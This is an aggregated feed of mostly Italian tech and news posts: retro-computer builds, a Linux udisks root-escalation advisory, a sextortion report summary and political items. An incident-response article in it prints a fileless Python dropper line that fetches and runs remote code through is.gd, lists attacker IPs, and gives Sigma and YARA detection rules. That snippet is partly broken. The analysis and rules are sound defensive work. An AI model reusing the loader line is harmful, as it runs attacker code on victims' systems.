Salta al contenuto principale



Mac SE Restomod has a Floppy Surprise


If he’s anything like us [Duncan Hall] was probably equal parts excited and disgusted when he found a 1987 Macintosh SE case at a garage sale. Excited, because not every day do vintage computers show up at these things. Disgusted, because it had been gutted and coated in house paint; the previous owner apparently wanted to make an aquarium. [Duncan] wanted to make a computer, and after 15 years, he finally did, calling it the PhoeNIX SE.
Note the small hole in the top floppy bay for the laptop webcam.
The NIX part of the name might make you suspect he’s running Linux on it, which yes, he absolutely is. The guts of this restomod were donated from a Dell XPS laptop, whose Core i7 CPU and motherboard power the project. A 9.7″ LCD serves in place of the original monochrome CRT, held in place by 3D printed hardware. While a purist might complain, it’s not like anyone makes replacement CRTs anymore, and once that’s gone? You might as well go full modern. (The analog board, on the other hand, is available. So is the logic board, if you were wondering. Lacking a CRT, some might have chosen e-ink instead, but the LCD looks good here.)
All ports are on the rear, as Steve would have wanted. That original sticker survived under latex paint is a spot of luck.
Having gone full modern, well, there’s no need for the M5011’s dual floppies, so one of them holds a webcam and monitor for a modern experience. A zoom call from that case would be a bit surreal, but we really appreciate the use of the empty floppy bay to keep the clean lines of the Macintosh SE unaltered. The other floppy bay (this is a dual-floppy unit) appears empty; we might have put an SD-card reader or something in there, but we absolutely agree with [Duncan]’s choice to 3D Print a new back panel and keep all I/O on the rear of the case, as God and Steve Jobs intended.

However you feel about restomodding retrocomputers (and we’re aware it’s a controversial practice), I think we can all agree this is a much better fate for the old Mac than becoming an aquarium. Thanks to [Loddington] for the tip.

If you’re on the side of the aisle that prefers to see restorations than restomods, the tips line is waiting for some quality restorations.


hackaday.com/2025/06/19/mac-se…



Bento is an All-In-One Computer Designed to be Useful


All-in-one computers in which the mainboard lurked beneath a keyboard were once the default in home computing, but more recently they have been relegated to interesting niche devices such as the Raspberry Pi 400 and 500.

The Bento is another take on the idea, coming at it not with the aim of replacing a desktop machine, instead as a computer for use with wearable display glasses. The thinking goes that when your display is head mounted, why carry around a screen with your laptop.

On top it’s a keyboard, but underneath it’s a compartmentalized space similar to the Japanese lunchboxes which lend the project its name. The computing power comes courtesy of a Steam Deck so it has a USB-C-for-everything approach to plugging in a desktop, though there’s a stated goal to produce versions for other boards such as the Raspberry Pi. There’s even an empty compartment for storage of peripherals.

We like this computer, both for being a cyberdeck and for being without a screen so not quite like the other cyberdecks. It’s polished enough that we could almost imagine it as a commercial product. It’s certainly not the first Steam Deck based cyberdeck we’ve seen.


hackaday.com/2025/06/20/bento-…



Linux Alert: Il bug su udisks consente l’accesso a Root sulle principali distribuzioni


Gli esperti avvertono che due nuove vulnerabilità di escalation dei privilegi locali possono essere sfruttate per ottenere privilegi di root sui sistemi che eseguono le distribuzioni Linux più diffuse. Il primo bug (CVE-2025-6018 è stato scoperto nella configurazione del framework Pluggable Authentication Modules (PAM) in openSUSE Leap 15 e SUSE Linux Enterprise 15. Il problema consente ad aggressori locali di ottenere privilegi utente allow_active.

Un altro bug (CVE-2025-6019) è stato scoperto in libblockdev e consente all’utente allow_active di ottenere privilegi di root tramite il demone udisks (un servizio di gestione dell’archiviazione utilizzato di default nella maggior parte delle distribuzioni Linux). Sebbene concatenare queste vulnerabilità consenta agli aggressori di ottenere rapidamente privilegi di root e di assumere il controllo completo del sistema, va sottolineato che il problema libblockdev/udisks è estremamente pericoloso anche da solo.

“Sebbene tecnicamente lo sfruttamento richieda privilegi allow_active, udisks è incluso di default in quasi tutte le distribuzioni Linux, quindi praticamente qualsiasi sistema è vulnerabile”, ha spiegato la Qualys Threat Research Unit (TRU), che ha scoperto entrambi i problemi. “Le tecniche per ottenere privilegi allow_active, incluso il problema PAM discusso in precedenza, abbassano ulteriormente questa barriera. Un aggressore può sfruttare queste vulnerabilità per compromettere immediatamente un sistema con il minimo sforzo.”

Gli ingegneri di Qualys hanno creato exploit PoC e sfruttato con successo la vulnerabilità CVE-2025-6019 per ottenere privilegi di root sui sistemi che eseguono Ubuntu, Debian, Fedora e openSUSE Leap 15. Nel suo rapporto, il team di consulenza sulla sicurezza di Qualys ha condiviso informazioni tecniche più dettagliate sulle vulnerabilità; i link alle soluzioni sono disponibili su Openwall .

“Data l’ubiquità degli udisk e la facilità con cui vengono sfruttati, le organizzazioni dovrebbero considerare questa vulnerabilità un rischio critico e continuo e implementare immediatamente le patch”, hanno affermato gli esperti. A proposito di vulnerabilità Linux, questa settimana la Cybersecurity and Infrastructure Security Agency (CISA) statunitense ha lanciato l’allarme sullo sfruttamento attivo di un vecchio bug, CVE-2023-0386 . Questo bug colpisce il sottosistema OverlayFS del kernel Linux e consente a un aggressore locale di aumentare i privilegi.

L'articolo Linux Alert: Il bug su udisks consente l’accesso a Root sulle principali distribuzioni proviene da il blog della sicurezza informatica.



Sextortion – reati informatici e sessuali, una analisi multidisciplinare della vittimologia maschile


“Permesso Negato” è una organizzazione non-profit la cui mission è fornire assistenza alle persone vittime di condivisione non consensuale di materiale intimo.

Questo reato negli ultimi anni ha registrato una enorme diffusione, non solo grazie alle nuove tecnologie e ai nuovi strumenti che lo rendono tecnicamente agevole, ma anche grazie allo sviluppo di una nuova sensibilità culturale che, anche mediante i canali di informazione di massa, ne dà la giusta rilevanza

“Permesso negato” ha recentemente pubblicato report all’esito di una indagine condotta tra le vittime a cui l’associazione ha fornito sostegno, in cui analizza il tema da diversi punti di approccio: giuridico, psicologico e sociologico.

Strumenti di controllo


“Permesso negato” e altre realtà hanno sviluppato uno strumento che consente alle vittime, reali o potenziali, di generare un codice hash del materiale che temono possa essere pubblicato. Il codice di hash altro non è che una stringa alfanumerica, univoca (non può esservene un’altra uguale), generata da un algoritmo in relazione al contenuto di un file. Di fatto si tratta di una sorta di impronta digitale del file in questione. Poiché ogni duplicazione del file avrà lo stesso codice di hash, le associazioni che partecipano al progetto condivideranno il codice con la propria rete. In questo modo sarà possibile dare un contributo nel rilevare e rimuovere i contenuti pubblicati senza autorizzazione.

Tra i siti internet che forniscono questo servizio troviamo Stop.NCII per gli adulti e Take It Down per i minorenni.

L’indagine


Il report pone in evidenza i suoi limiti: il dataset è limitato solo alle vittime che spontaneamente hanno contattato l’associazione. Tuttavia, essendo un set di circa mille soggetti, può comunque offrire uno “spaccato” significativo, utile per l’ attività di analisi.

In secondo luogo, poiché il report vuole focalizzare l’attenzione sulle vittime maschili di questa tipologia di reato, il dataset rischia di essere ampiamente sottodimensionato. Infatti il senso di panico, vergogna e vulnerabilità che spesso inibisce le vittime dal denunciare quanto accaduto, porta a ritenere che i numeri reali potrebbero essere ben più rilevanti.

Il reato- la sextortion


La condotta di pubblicazione di materiale a contenuto sessuale, senza consenso, è disciplinata penalmente dall’art. 612-ter del Codice Penale. L’articolo in questione è titolato “diffusione illecita di immagini o video sessualmente espliciti”. Definizione certamente più corretta rispetto a quella più popolare di revenge porn.

L’etichetta di revenge porn, infatti, è fuorviante poiché presuppone un intento vendicativo (revenge, appunto) da parte del soggetto agente, mentre il fenomeno è ben più diffuso. Le motivazioni ritorsive sono solo una parte delle ragioni che muovono l’autore del reato il quale, molto spesso, ha l’obiettivo del guadagno. In questo caso compie una vera e propria condotta estorsiva.

Il fenomeno della sextortion individua la condotta attraverso cui un soggetto minaccia la vittima di rivelare notizie e di diffondere immagini di natura sessuale che la riguardano, in modo da costringerla a comportarsi in un certo modo.

Spesso queste immagini e video vengono acquisite mediante attività di hacking tra le più diverse, dall’accesso abusivo a reti informatiche ad attività di social engeneering. Quest’ultima è la condotta analizzata dal report in discussione.

Il luogo del delitto


Una ulteriore circostanza qualificante che accomuna molti reati perpetrati tramite estorsione informatica, è che spesso la richiesta riguarda il pagamento di somme di denaro. Procedura che si compie mediante pagamenti telematici.

Ne consegue che il luogo in cui si produce “il danno” (cioè quello in cui avviene l’addebito della somma), è diverso dal luogo ove si realizza l’ingiusto profitto (l’accredito della somma). A volte, quando vengono utilizzati metodi di pagamento che non consentono accrediti immediati, anche il tempo del danno è diverso da quello del profitto.

La giurisprudenza ha chiarito che il luogo di commissione del delitto è quello dell’accredito delle somme (es. ove è stato aperto il conto corrente beneficiario), e il tempo del reato è quello in cui avviene l’accredito della somma.

Sul tema della qualificazione del reato, gli autori del report auspicano l’introduzione di un delitto specifico di estorsione sessuale nel codice penale. Chi scrive, per diverse ragioni, non concorda con questa idea poiché, a differenza degli autori del report, non ritiene che un nuovo reato possa fornire quella chiarezza giuridica o quella sensibilizzazione auspicata dagli autori del lavoro qui presentato.

Le indagini


I reati commessi mediante l’ausilio di tecnologie informatiche richiedono specifiche attività di indagine, disciplinate dalla L. 48/2008 per cui l’Autorità Giudiziaria può acquisire informazioni con misure tecniche che ne assicurino la conservazione dei dati originali e che ne impediscano l’alterazione. Una delle modalità più sicure e utilizzate è rappresentata dalla copia forense dei file, cioè una copia esatta delle informazioni presenti sul supporto informatico.

Il tema inerente alla valenza probatoria degli screenshot ha generato diverse discussioni nell’ambiente giuridico, e ha visto pronunce diverse e contrastanti da parte della giurisprudenza. La Corte di Cassazione ha infatti confermato, in diverse occasioni, la valenza probatoria degli screenshot come mezzi idonei a dimostrare l’esistenza dei messaggi di testo rappresentati nell’immagine. Invero recentemente la stessa Corte ha ritenuto di correggere questo suo indirizzo, quantomeno per quanto concerne le prove raccolte dalla Polizia Giudiziaria, la quale è chiamata a dare applicazione alle tecniche di digital forensics.

I Dati


Lo studio si è basato su più di mille casi raccolti dall’associazione che lo ha condotto, e l’analisi delle informazioni raccolte ha riservato alcune sorprese.

In particolare, si scopre che il maggior numero di vittime del reato di sextortion è di genere maschile. Quasi il 90% dei casi riguarda uomini che, adescati sul web e convinti a condividere informazioni e immagini personali, vengono successivamente minacciati al fine di ottenere dei benefici.

In molti di questi casi, l’esca utilizzata è stata l’immagine di una donna, ulteriore conferma della tendenza alla sessualizzazione del corpo femminile.

La strategia di adescamento


L’adescamento della vittima segue, tendenzialmente, alcune fasi ben specifiche.

In un primo momento la vittima viene contattata, solitamente su piattaforme molto note e utilizzate. Dopo un primo approccio inizia la condivisione di informazioni personali: alcune emergono durante la conversazione pilotata dall’attaccante, altre informazioni vengono invece carpite dal profilo del social network a cui la vittima è registrata.

A questo punto il bersaglio dell’attacco viene convinto a spostare la conversazione su piattaforme diverse, notoriamente più restie a collaborare con l’Autorità durante le indagini. Qui la conversazione viene abilmente dirottata su temi più intimi, convincendo la vittima che questo livello di confidenza sia del tutto normale.

Una volta ottenute informazioni, immagini o testi compromettenti, questi vengono registrati dal criminale, il quale ora conclude la propria strategia mettendo in campo la minaccia di divulgare il contenuto della conversazione, qualora la vittima non soddisfi le sue richieste.

In questa fase si registrano due diverse domande, a seconda del genere sessuale di appartenenza della vittima. Se questa è una donna, l’attaccante tende a chiedere ulteriore materiale sessualmente esplicito. Se la vittima è un uomo, viene indirizzata una richiesta economica.

Anche in questo frangente si assiste all’enfatizzazione del pregiudizio di genere: la donna vista come oggetto del desiderio sessuale, l’uomo considerato per la sua capacità economica.

Inizialmente l’estorsore formula richieste economicamente molto elevate, adottando una strategia aggressiva. Ciò gli consente di lasciare credere alla sua vittima di avere il controllo della situazione quando questa inizierà a trattare e l’attaccante fingerà di acconsentire a ridurre le proprie richieste incontrando le richieste avanzate dalla sua vittima.

Il ruolo delle piattaforme on-line


I provider di servizi on-line non sono legalmente responsabili per i contenuti pubblicati dai loro utenti, salvo il caso in cui abbiano consapevolezza effettiva dell’illecito e non rimuovano tempestivamente i contenuti illegali.

Il Digital Service Act, in vigore dal 2023, ha introdotto alcuni obblighi per le piattaforme aventi più di 45 milioni di utenti mensili. Queste realtà ora sono obbligate ad essere maggiormente coinvolte nella lotta ai contenuti illeciti, bilanciando libertà di espressione e tutela degli utenti.

Il rapporto psicologico tra vittima ed estorsore


Si sviluppa in una dinamica di controllo progressivo ove il ricattatore, acquisita la fiducia della sua vittima, dà vita ad un ciclo di minacce e richieste. La vittima vive una sensazione di impotenza e invoca un intervento salvifico esterno. Il persecutore, invece, adotta un ruolo autoritario, colpevolizzando la vittima.

A volte accade che la vittima si responsabilizzi della situazione, andando così ad alimentare una forma di auto-persecuzione che si aggiunge a quella già finalizzata dall’estorsore.

In alcune occasioni il persecutore si pone anche nel ruolo del salvatore, quando offre alla vittima una soluzione, ad esempio promettendo di non divulgare il materiale sottratto, in cambio del soddisfacimento delle sue richieste. Naturalmente questo è un ulteriore livello di manipolazione della vittima. Questo atteggiamento, infatti, lungi dall’essere una offerta di aiuto, rappresenta una strategia di controllo a lungo termine mediante l’alimentazione dell’illusione di una ipotetica conclusione della vicenda, senza però restituire mai alla vittima la reale libertà.

Le reazioni


Le vittime reagiscono in molti modi diversi. Alcune persone provano ad affrontare la minaccia direttamente, ad esempio denunciando il ricattatore o bloccando ogni canale di contatto e chiedendo supporto tecnico-legale.

In altri casi la vittima si rifiuta di affrontare la realtà, si isola o adotta comportamenti autolesivi.

Una delle conseguenze a lungo termine più rilevanti è lo sviluppo di Disturbi da Stress Post-traumatico. L’esperienza traumatica, infatti, non riguarda solo l’evento singolarmente considerato, bensì la “cronicizzazione della minaccia”. Il timore che il materiale utilizzato per l’estorsione possa riemerge in futuro o che il ricattatore torni a manifestare le sue richieste, determinano uno stato di allerta costante nella vittima.

La società


Da una indagine svolta da Save the Children nel 2024 è emerso che la maggior parte dei ragazzi minorenni intervistati ritiene che chi invia foto intime sia consapevole, e quindi si assuma i rischi derivanti da questo comportamento, mentre il 34% ritiene che ricevere foto intime non richieste sia una manifestazione di interesse, soprattutto tra i maschi coinvolti in una relazione sentimentale

E il futuro?


La diffusione dell’intelligenza artificiale ha amplificato e moltiplicato i pericoli. Attraverso questi strumenti, infatti, è possibile creare scenari iperrealistici che possono essere utilizzati anche a fini estorsivi.

Si pensi al caso dei deep nudes, immagini o video alterati per mostrare persone nude senza aver avuto alcun consenso.

Questi strumenti vengono utilizzati anche per creare immagini di donne in atteggiamenti sensuali da utilizzare come “esche” per l’adescamento iniziale sul web. In questo caso vi è una seconda vittima: la persona a cui sono state sottratte le immagini e modificate.

In ultimo, si pensi alla possibilità di creare immagini di nudo compromettenti e falsi partendo da fotografie pubblicate sui social network, che vengono poi sfruttate come leva per il ricatto. In questo caso l’estorsore non deve neppure “mettere in campo” tutte quelle strategie e fasi di cui si è parlato nelle righe precedenti.

La condivisione di informazioni on-line è una attività che rischia di rivelarsi pericolosa e che ha rovinato delle vite, per tale ragione è sempre più fondamentale una adeguata educazione digitale per gli utenti di ogni età.

Qui la pagina web da cui è possibile effettuare il download del report.

L'articolo Sextortion – reati informatici e sessuali, una analisi multidisciplinare della vittimologia maschile proviene da il blog della sicurezza informatica.



Stealth Malware: la nuova frontiera del cybercrime


Accessi anomali e un loader Invisibile: storia di un attacco fileless evitato per un soffio

Abstract: Un caso reale di incident response porta alla scoperta di quello che chiameremo “Unknown Malware AP”, un sofisticato loader fileless basato su Python, capace di eseguire codice remoto usando Telegram e is.gd come vettori. Il malware sfugge ai rilevamenti tradizionali, ma viene individuato grazie all’intuito analitico e alla correlazione tra eventi di basso impatto.

L’articolo ricostruisce la catena di compromissione, le modalità di esecuzione fileless e le tecniche di detection efficaci per intercettarlo.

Introduzione


Quando un cliente mi chiama con preoccupazione per delle e-mail di mancato recapito verso indirizzi sconosciuti, la mente va subito a un possibile caso di spoofing o compromissione. Ma quello che si nascondeva sotto era molto di più: un loader fileless, invisibile agli antivirus e capace di eseguire codice remoto usando Telegram come canale di comando.

L’intervento di emergenza


La mailbox di un dipendente invia email fantasma, generate da un’origine ignota. Il primo passo è deployare un EDR su tutte le macchine della rete. Quasi subito emergono anomalie: un processo parte da un percorso insolito `C:\Users\Public\Windows\svchost.exe` e lancia un file denominato `Photos`.

La command line incriminata è:

"C:\Users\Public\Windows\svchost.exe"
C:\Users\Public\Windows\Photos

Il file `svchost.exe`, dal nome ingannevole ed in un percorso decisamente anomalo, risulta essere un interprete Python.

L’hash SHA256 è: ff507b25af4b3e43be7e351ec12b483fe46bdbc5656baae6ad0490c20b56e730

Nonostante l’analisi su VirusTotal non evidenzi nulla di sospetto, qualcosa, come evidente, non torna.

Il nodo: il file `Photos`


Grazie all’EDR, ispeziono le linee di comando e identifico Photos come il vero core: un file codificato in Base64 che, una volta decifrato, rivela un dropper Python che esegue questo codice:

import requests, re

exec(requests.get(requests.head(f'https://is.gd/{match.group(1)}', allow_redirects=True).url).text)

if (match := re.search(r'

Connessioni anomale


L’EDR registra comunicazioni verso tre IP:

  • 45.63.94.214
  • 104.25.233.53
  • 149.154.167.99

Il tutto, classificato solo come alert di media gravità. Un segnale che, in un SOC affollato da log e warning, sarebbe potuto passare inosservato.

Un loader su misura


Non esistono corrispondenze pubbliche note con altri loader. Nessuna traccia in ambienti come Hybrid Analysis, VirusTotal ed altri strumenti di analisi. Tutto lascia supporre che si tratti di un loader sviluppato su misura, potenzialmente generato o rifinito con strumenti AI.

Epilogo: la differenza tra SOC automatico e analisi umana


In un contesto altamente rumoroso, questo attacco avrebbe potuto annidarsi per mesi senza essere scoperto. Nessuna firma, nessuna traccia persistente, solo una command line anomala e delle email di rimbalzo come unica spia.

Ma proprio quell’incongruenza, colta dall’intuito umano, ha dato inizio all’analisi.

Un’analisi che ha rivelato un dropper silente, che avrebbe potuto aprire la strada aransomware, backdoor, esfiltrazione.

Non è finita con un disastro.

Ma ci è mancato poco.

Regole utili al rilevamento

Sigma Rule:


title: Python Fileless Loader via Telegram and is.gd
logsource:
category: process_creation
product: windows
detection:
selection:
Image: '*\\python.exe'
CommandLine|contains:
- requests.get(
- exec(
- t.me/
- is.gd/
condition: selection
level: high
description: Detects Python-based fileless dropper fetching payload via Telegram + is.gd
author: Agostino Pellegrino
falsepositives:
- Development environments using dynamic remote loading (rare)
references:
- attack.mitre.org/techniques/T1…
- attack.mitre.org/techniques/T1…
tags:
- attack.t1059
- attack.t1071.001
- fileless
- telegram
- loader
YARA Rule:
rule Unknown_Malware_AP_Fileless_Telegram_Loader {
meta:
description = "Detects Python fileless dropper using Telegram and is.gd"
author = "Agostino Pellegrino"
version = "1.0"
date = "2025-06-18"
strings:
$py_exec_requests = "exec(requests.get(" ascii
$py_telegram_url = "https://t.me/" ascii
$py_isgd_url = "https://is.gd/" ascii
$py_og_regex = "og:description" ascii
condition:
2 of them and filesize

L'articolo Stealth Malware: la nuova frontiera del cybercrime proviene da il blog della sicurezza informatica.



comunque non per togliere responsabilità agli usa, ma cercando di essere obiettiva e precisa, credo che il problema sia stato Kissinger più che i presidenti usa in generale. anche perché per qualche motivo c'è sempre stata una politica estera ufficiale e una ufficiosa separata. e quella ufficiosa, anche se cambiavano i presidenti, alla fine era sempre e soltanto di Kissinger. ha fatto la politica usa per 50 anni. con la sua logica semplicistica del tipo: il nemico del mio nemico è mio amico, nonché l'assoluta assenza di scrupoli. l'unico suo punto a favore può essere stato perlomeno di aver fatto una politica coerente (sempre la stessa). altre cose pro non riesco a trovarne. contro parecchie.



Заявление Пиратского интернационала об эскалации конфликта на Ближнем Востоке


Пиратская партия России, являясь партией-основательницей и неотъемлемой частью международного пиратского движения, публикует заявление пиратского интернационала об эскалации конфликта на Ближнем Востоке.

Мы в Пиратском интернационале с глубокой обеспокоенностью наблюдаем за последней эскалацией между Израилем и Ираном. Израиль заявляет, что нанёс упреждающие удары по ядерным и военным объектам Ирана. Однако режим Нетаньяху уже ведет разрушительную войну в Газе, и его военные действия, похоже, продиктованы в большей степени политическим выживанием и стремлением укрепить своё наследие, чем реальной безопасностью. Международное сообщество вправе требовать четких доказательств и прозрачности в отношении этих атак.

С другой стороны, режим Хаменеи в Иране также правит жестоко. Иран продолжает наносить удары по гражданским объектам, намеренно выбирая цели, далёкие от законных военных объектов. Иранскому режиму необходимо немедленно прекратить разработку ядерного оружия, поддержку терроризма против еврейских общин и поставки вооружения таким группировкам, как хуситы в Йемене и «Хезболла» в Ливане.

Пиратский интернационал подчёркивает, что дипломатические решения должны иметь приоритет над военной агрессией. Мы глубоко обеспокоены конфликтом, который угрожает миллионам невинных жизней, создаёт риск серьёзных ядерных инцидентов и становится всё более непредсказуемым. Общественность справедливо опасается, что ядерные арсеналы уже могут быть задействованы, ставя под угрозу мирных жителей, которые не могут полагаться исключительно на системы ПВО и бомбоубежища.

Мы однозначно призываем к немедленному прекращению огня.

Наше движение объединяет людей по всему миру, включая членов Пиратской партии в Израиле, сочувствующих в Иране и многих выходцев из Ирана, живущих в изгнании. По-настоящему отрадно, что наши израильские и иранские коллеги конструктивно обсуждают этот кризис, открыто исследуя пути к миру. Мы лишь можем пожелать, чтобы политические лидеры, укоренившиеся в обоих правительствах, проявили такую же мудрость и человечность.

Мы выступаем за большую свободу, прозрачность и права человека для всех пострадавших народов. Мы настоятельно призываем к возобновлению диалога на уровне гражданского общества и открытию каналов связи между жителями Израиля и Ирана, которых объединяет общий интерес к миру и согласию. Прошлые попытки объединить эти сообщества напоминают нам, что солидарность и взаимопонимание достижимы.

Мы призываем все стороны ставить жизнь мирных жителей выше любых политических амбиций. Пиратский интернационал твёрдо выступает за мир, прозрачность и силу людей, а не режимов.

Оригинал на английском: pp-international.net/2025/06/i…

Сообщение Заявление Пиратского интернационала об эскалации конфликта на Ближнем Востоке появились сначала на Пиратская партия России | PPRU.






Giuliana Sgrena – Me la sono andata a cercare – Diari di una reporter di guerra.
freezonemagazine.com/articoli/…
Ci sono libri che arrivano come testamenti, altri come confessioni, altri ancora come richieste di ascolto. Me la sono andata a cercare di Giuliana Sgrena appartiene a tutte queste categorie insieme, ma ne supera i confini. È un libro che non si limita a raccontare una vita in prima linea: è il


La situazione incendiaria dei powebank Anker

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Anker ha avviato una maxi campagna di richiamo per un milione di powerbank PowerCore 10000. L'azienda sta gestendo altri tre richiami per altrettanti device. E startmag.it/innovazione/la-sit…



Tenetevi pronti


Oggi daremo la spallata definitiva al sistema capitalistico, contiamo che entro il fine settimana avremo instaurato dei soviet nelle principali città italiane.




L’amore ai tempi dell’Intelligenza Artificiale


@Giornalismo e disordine informativo
articolo21.org/2025/06/lamore-…
In un’epoca sempre più definita dagli algoritmi e dalla logica dell’utile, l’uscita della raccolta poetica La metrica dell’amore di Sandro Montanari (Pioda Imaging Edizioni, 2025) è un invito a riflettere sull’essenziale umano e su quel



One event down. Join us on June 21st!


Thanks to everyone who helped map surveillance cameras in Harvard Square. We identified nearly 50 surveillance cameras between JFK Street, Mount Auburn Street, Bow Street and Massachusetts Avenue.

Join us this Saturday, June 21st, at the Boxborough Fifers Day. Tell us if you will help us at the table. It is a wonderful event that celebrates our Revolutionary War history.


masspirates.org/blog/2025/06/1…



#Iran, il dittatore va alla guerra


altrenotizie.org/primo-piano/1…



Verso il summit dell’Aia. La Nato semplifica la macchina interna

@Notizie dall'Italia e dal mondo

In vista del summit che si terrà all’Aia il 24 e 25 giugno, la Nato ha avviato una riorganizzazione interna che prevede la soppressione di alcune divisioni e la riduzione di posizioni nel quartier generale di Bruxelles. L’operazione è parte di un piano di razionalizzazione delle attività






Sfida ai droni iraniani Shahed. Ecco il nuovo sistema di Mbda

@Notizie dall'Italia e dal mondo

Semplici, economici ed efficaci, i droni della famiglia Shahed sviluppati dai tecnici della Repubblica Islamica dell’Iran sono da anni impiegati in modo estensivo nel conflitto in Ucraina, divenendone addirittura uno dei simboli. L’importanza di questi sistemi per lo sforzo bellico di Mosca è



Iran: gli Stati Uniti sono pronti ad attaccare


@Notizie dall'Italia e dal mondo
Continuano gli scontri tra Iran e Israele. Netanyahu preme su Washington per partecipare all'aggressione militare ma Trump vuole decidere all'ultimo minuto
L'articolo Iran: gli Stati Uniti sono pronti ad attaccare proviene da Pagine Esteri.



Carbon Budget in esaurimento veloce...

Da una valutazione recente, il Carbon Budget restante, per poter contenere entro +1,5°C il riscaldamento globale, è di circa 130 miliardi di tonnellate di CO2 e verrebbe, a ritmi attuali, emesso in soli 3 anni.
😢😭 😤😡

phys.org/news/2025-06-global-c…



Open Internet Stack: The EU Commission’s vague plans for open source


netzpolitik.org/2025/open-inte…

reshared this



Processo Hydra, Libera è parte civile


@Giornalismo e disordine informativo
articolo21.org/2025/06/process…
Ieri pomeriggio nell’aula bunker del carcere di Opera si è tenuta la terza udienza preliminare del processo Hydra, nato dall’inchiesta realizzata dalla Direzione Distrettuale Antimafia di Milano. L’ipotesi accusatoria ha consentito di ricostruire quello che è un




Gcap, droni e interoperabilità. L’Italia tra ambizioni autonome e scenari integrati

@Notizie dall'Italia e dal mondo

All’interno del programma Gcap la componente senza pilota resta ancora in una fase fluida, priva di un’integrazione strutturata all’interno della tabella di marcia ufficiale. Lo ha chiarito l’amministratore delegato di Leonardo, Roberto Cingolani, sottolineando come l’Italia stia valutando



#Maturità2025, sul sito del #MIM sono state pubblicate le tracce della seconda prova scritta.

Le trovate qui ▶️ mim.gov.it/web/guest/-/-maturi…

#MIMaturo



A Torino sono nati i Pirati della Cultura: creiamo una via alternativa e sostenibile alla distribuzione dei libri

quotidianopiemontese.it/2025/0…

Come evitare che la distribuzione si mangi tutto il margine e far risparmiare piccoli editori e lettori Scopri i Pirati della Cultura: libri di qualità dai piccoli editori ai lettori, senza costi di distribuzione e con sconti reali per tutti.


Un libro per l'estate


Vorrei leggere un libro sulla meccanica quantistica per capirci PER DAVVERO qualcosina ma per farlo bisogna che veda qualche equazione perché le spiegazioni qualitative non mi bastano più.

Quindi, mi servirebbe un libro che sia più dettagliato (anche più tecnico) di un libro divulgativo ma allo stesso tempo meno impegnativo di un testo universitario perché mi manca buona parte della matematica necessaria (sono ingegnere quindi arrivo fino ad Analisi II ma poi lì mi fermo).

Avete letto qualcosa che potrebbe fare al caso mio?

Ho visto che nella serie delle lezioni di Fisica di Feynman c'è un volume, il terzo, dedicato alla meccanica quantistica, l'avete letto? Può essere quello giusto?

("QED", di Feynman, l'ho già letto e ha cambiato il mio modo di guardare il mondo quando apro la finestra 😍)

#Fisica #fisicaDelleParticelle #meccanicaquantistica #scienza

Unknown parent

@Comandante Virgola

È che io durante la settimana non riesco mai a liberarmi prima delle dieci di sera e a quell'ora anche una tabellina del tre può buttarti tra le braccia di Morfeo 😁



Bluesky accoglie, verifica e ospita apertamente i resoconti di importanti politici di estrema destra. Il vicepresidente di Trump, Vance, è ora su Bluesky:

@Che succede nel Fediverso?

bsky.app/profile/jd-vance-1.bs…

"Diamo il benvenuto al Vicepresidente alla conversazione su Bluesky" (Bluesky nella sua e-mail a Fox News)

Altro 🚩: Bluesky è centralizzata, gestita da una società a scopo di lucro, il suo CEO ha un background nel settore blockchain ed è in parte di proprietà di VC e Blockchain Capital.

Bluesky sta seguendo esattamente la stessa strada del Nazi Bar di Twitter.

Il post di @Fedi.Tips

social.growyourown.services/us…


Bluesky are openly welcoming, verifying and hosting accounts of prominent far right politicians. Trump's VP Vance is now on Bluesky:

bsky.app/profile/jd-vance-1.bs…

"We welcome the Vice President to the conversation on Bluesky" (Bluesky in their email to Fox News)

More 🚩: Bluesky is centralised, run by a for-profit corporation, its CEO has blockchain background, it is partly owned by VCs & Blockchain Capital.

Bluesky are going down exactly the same Nazi Bar path as Twitter.

(via @mastodonmigration)




Come il wargaming aiuta a decidere in guerra. La visione della Marina Militare

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
"Nelle operazioni militari, la capacità nel prendere decisioni è fondamentale: decidere rapidamente e bene permette di mantenere l’iniziativa e costringere l’avversario a



La grande tradizione ligure viene interrogata, inseguita, ma come una traccia che conduce altrove adrianomaini.altervista.org/la…


Autonomia o irrilevanza. La sfida strategica dell’Europa nella nuova era nucleare secondo Preziosa

@Notizie dall'Italia e dal mondo

Il confronto tra Iran e Israele, sostenuto dalla proiezione tecnologica e strategica americana, non rappresenta solo un conflitto regionale: è il primo banco di prova concreto della nuova era nucleare e multipolare. Tuttavia, l’insegnamento che l’Europa deve trarne va ben



Cosa funziona per evitare i furti in casa? I consigli della Rete Europea di Prevenzione

L'EUCPN è la Rete Europea per la Prevenzione della Criminalità. La Rete mira a collegare i livelli locale, nazionale ed europeo e a promuovere la conoscenza e le pratiche di prevenzione della criminalità tra gli Stati membri dell' #UE.
Dal 2019, la Rete europea di prevenzione della criminalità (#EUCPN) e diversi paesi europei hanno organizzato il Focus Day dell’UE dedicato ai furti con scasso nelle abitazioni.

317947

La sesta edizione dell'EU Focus Day sui furti in casa si è svolta il 18 giugno 2025.
Con una campagna di prevenzione e iniziative locali, l'EUCPN, diversi paesi europei, Europol e la Commissione europea mirano a intensificare la lotta contro questo reato, informando i cittadini sulla possibilità di proteggere la propria abitazione dai furti.

317948

I reati contro la proprietà, e più specificamente i furti con scasso, colpiscono molti cittadini europei. Fortunatamente, i furti con scasso sono prevenibili e non devono essere costosi! La ricerca dimostra chiaramente l'efficacia di serrature migliorate per porte e finestre o di luci esterne che si accendono quando i sensori rilevano movimento e fulmini interni con timer. Queste misure aumentano il rischio di essere scoperti e/o lo sforzo necessario per entrare in un'abitazione. Queste misure di sicurezza migliorate hanno prevenuto un gran numero di reati e hanno portato a un reale calo della criminalità. La morale per chi si occupa della prevenzione dei reati, tuttavia, non è quella di sedersi e rilassarsi. Al contrario! Molte persone sono ancora vittime di furti con scasso. Ecco perché 22 paesi europei, uniti nell'EUCPN (European Crime Prevention Network) e nell'EMPACT, hanno unito le forze per lanciare questa iniziativa.

317949

